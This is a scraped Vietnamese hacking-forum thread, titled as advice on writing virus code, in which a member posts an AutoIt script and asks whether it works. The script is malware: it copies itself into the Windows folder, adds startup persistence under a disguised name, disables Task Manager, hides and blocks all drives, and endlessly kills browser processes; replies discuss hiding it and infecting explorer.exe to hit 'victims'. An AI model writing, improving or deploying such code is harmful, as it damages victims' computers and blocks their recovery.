|
http://forum.kaspersky.vn/showthread.php?15658-Help-!!-M%E1%BB%99t-Virus-xuy%C3%AAn-b%C4%83ng-n%E1%BB%AFa-SysAnti
Ai liều chết xem thử em này nào |
|
Bi Kịch Antivirus Vietnam = BKAV |
|
|
|
[Discussion] Góp ý viết code virus |
05/06/2010 06:53:15 (+0700) | #22 | 212380 |
vậy thì phải có đoạn code của phần mềm udf xong thì code virus |
|
|
|
|
[Discussion] Góp ý viết code virus |
05/06/2010 10:37:06 (+0700) | #23 | 212406 |
minhducitpro
Member
|
0 |
|
|
Joined: 01/06/2010 20:09:37
Messages: 15
Offline
|
|
các bác cho em hỏi đoạn này có khả năng chạy không ạ thanks cácn bác.
#Notrayicon
FileCopy(@ScriptDir & "\minhduc.exe","C:\WINDOWS",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\minhduc.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")
While 1
If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd |
|
|
|
|
[Discussion] Góp ý viết code virus |
06/06/2010 08:18:34 (+0700) | #24 | 212496 |
handaewoo wrote:
Cái đoạn đó dis mất cái taskmanager + regedit + siêu ẩn + lây vào explore.exe cho mỗi lần khởi động winlogon.exe là máy nạn nhân dính chưởng
PS : sao không thấy dòng #no tray icon hả bác minhnguyenquang75
à quên, nhưng mà k cần #no tray icon cũng k hiện cửa sổ lúc virus hoạt động. Mà có hiện cũng k làm gì dc |
|
|
[Discussion] Góp ý viết code virus |
06/06/2010 08:21:13 (+0700) | #25 | 212497 |
minhducitpro wrote:
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\minhduc.exe")
File này chưa xác định nếu có sửa explore.exe thành minhduc.exe thì cũng k gây nguy hiểm cho nạn nhân |
|
|
|